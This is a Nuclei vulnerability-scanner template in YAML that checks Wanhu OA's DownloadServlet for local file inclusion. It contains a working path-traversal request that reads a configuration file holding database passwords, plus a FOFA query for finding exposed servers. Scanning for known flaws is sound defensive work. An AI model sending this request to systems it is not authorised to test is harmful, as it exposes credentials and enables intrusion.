nuclei-templates/http/vulnerabilities/wanhu/wanhuoa-downloadservlet-lfi...

30 lines
1.4 KiB
YAML

id: wanhuoa-downloadservlet-lfi
info:
name: Wanhu OA DownloadServlet - Local File Inclusion
author: wpsec
severity: high
description: |
There is an arbitrary file reading vulnerability in the Wanhu OA DownloadServlet interface. An attacker can use the vulnerability to read sensitive files in the server and obtain sensitive information.
reference:
- https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E4%B8%87%E6%88%B7OA%20DownloadServlet%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E4%B8%87%E6%88%B7OA/%E4%B8%87%E6%88%B7OA%20DownloadServlet%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
metadata:
verified: true
max-request: 1
fofa-query: app="万户网络-ezOFFICE"
tags: oa,wanhu,lfi
http:
- method: GET
path:
- "{{BaseURL}}/defaultroot/DownloadServlet?modeType=0&key=x&path=..&FileName=WEB-INF/classes/fc.properties&name=x&encrypt=x&cd=&downloadAll=2"
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains(body,'ccerp.password')"
- "contains(header,'application/x-msdownload')"
condition: and
# digest: 490a0046304402207ef85b10290ca27c74e792fd73923534c7c0a6b2a5a956fcf633a99fcdf3db3b022053a023013b4748f72e9176b59d85e916207ea716156797085c744a011c3f54e7:922c64590222798bb761d5b6d8e72950